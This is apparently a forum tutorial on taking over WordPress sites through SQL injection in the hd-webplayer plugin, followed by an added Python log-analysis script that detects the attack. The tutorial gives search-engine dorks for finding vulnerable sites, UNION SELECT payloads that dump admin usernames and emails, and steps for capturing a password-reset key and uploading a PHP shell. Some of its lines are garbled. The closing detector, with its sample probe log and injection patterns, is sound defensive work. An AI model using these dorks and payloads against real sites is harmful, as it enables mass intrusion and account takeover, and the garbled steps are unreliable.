As requested by a few of you, I decided to make this small tutorial on how to compromise a WordPress site through an SQL injection in one of its plugins.
So let's begin.
I will use this 0day by JoinSeventh.
First of all we need to find a vulnerable page.
We enter this in Google:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?id="
# Dork 3 (general):
inurl:"/wp-content/plugins/hd-webplayer/"
Once you have found a site, you need the admin's username and email.
I will be using this site for example:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?id=3
When I append a ' to the id value, the page content disappears, so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?id=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
http://www.site.com/wp-login.php
And press "Lost your password?"
Now you enter either username or email.
We can enter either, so it doesn't matter.
I entered email.
Now when you got:
"Check your e-mail for the confirmation link."
It means that the reset link was sent successfully.
Now we need to get the reset key.
Go back to the syntax you used for extracting email and username and do this:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?id=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?id=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user__,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
Go to:
wp-login.php?action=rp&=reset&login=username
NOTE: Replace = & login=
So my link will be:
Enter the new password:
Log in with the new password and shell it.
Download PHP shell
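Seen from the defending side, the chain above leaves a recognisable trail in the web server's access log: injection probes against the plugin's numeric id parameter, followed within minutes by password-reset traffic on wp-login.php from the same source address. The Python script below is an added example, not part of the original post: it parses a few constructed Apache combined-format log lines (the IPs, timestamps and request paths are made up for the demonstration), flags the injection indicators and correlates them with reset activity. The log format, the plugin path, the 15-minute correlation window and the severity labels are all assumptions of this example.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample log (Apache combined format); nothing here is real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=3' HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=-3%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11%20FROM%20wp_users-- HTTP/1.1" 200 734 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:57:10 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:58:30 +0000] "GET /wp-login.php?action=rp&login=admin HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:14:01:00 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Strings that have no business in a plugin's numeric lookup parameter.
SQLI_PATTERNS = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("group-concat", re.compile(r"group_concat\s*\(", re.I)),
    ("wp_users-read", re.compile(r"\bfrom\s+wp_users\b", re.I)),
]


def parse_line(line):
    """Turn one access-log line into an event dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": parts.path, "query": unquote_plus(parts.query),
            "status": int(m.group("status"))}


def sqli_indicators(event):
    """Names of injection indicators found in one request to a plugin endpoint."""
    hits = []
    if not event["path"].startswith("/wp-content/plugins/"):
        return hits
    query = event["query"]
    for name, pattern in SQLI_PATTERNS:
        if pattern.search(query):
            hits.append(name)
    # The plugin's id is an integer key; a stray quote or anything else is a probe.
    for value in parse_qs(query, keep_blank_values=True).get("id", []):
        if not re.fullmatch(r"-?\d+", value):
            hits.append("non-numeric-id")
            break
    return hits


def is_reset_activity(event):
    """True for the WordPress password-reset flow on wp-login.php."""
    if event["path"] != "/wp-login.php":
        return False
    action = parse_qs(event["query"]).get("action", [""])[0]
    return action in ("lostpassword", "rp", "resetpass")


def analyze(log_text, window_minutes=15):
    """Correlate plugin SQLi probes with reset traffic from the same address.

    A source that probes the plugin and then touches the reset flow within the
    window is rated critical: that is the sequence an attacker follows when the
    injection is used to read reset data out of the database.
    """
    window = timedelta(minutes=window_minutes)
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    by_ip = {}
    for e in events:
        by_ip.setdefault(e["ip"], []).append(e)
    findings = []
    for ip, evs in by_ip.items():
        probes = [(e, h) for e in evs for h in [sqli_indicators(e)] if h]
        if not probes:
            continue
        first_probe = min(e["ts"] for e, _ in probes)
        reset_after = any(is_reset_activity(e) and
                          first_probe <= e["ts"] <= first_probe + window
                          for e in evs)
        findings.append({
            "ip": ip,
            "sqli_requests": len(probes),
            "indicators": sorted({name for _, h in probes for name in h}),
            "reset_activity": reset_after,
            "severity": "critical" if reset_after else "high",
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Feeding the constructed log through `analyze` yields one critical finding for 203.0.113.7 (two probing requests, then reset traffic inside the window) and nothing for 198.51.100.4, whose request carries a plain integer id. The same probe/reset correlation transfers to any plugin that looks records up by numeric id; only the path prefix and the window need adjusting. Alerting on the `non-numeric-id` indicator alone is what catches the quick quote test the tutorial starts with, before any UNION payload is sent.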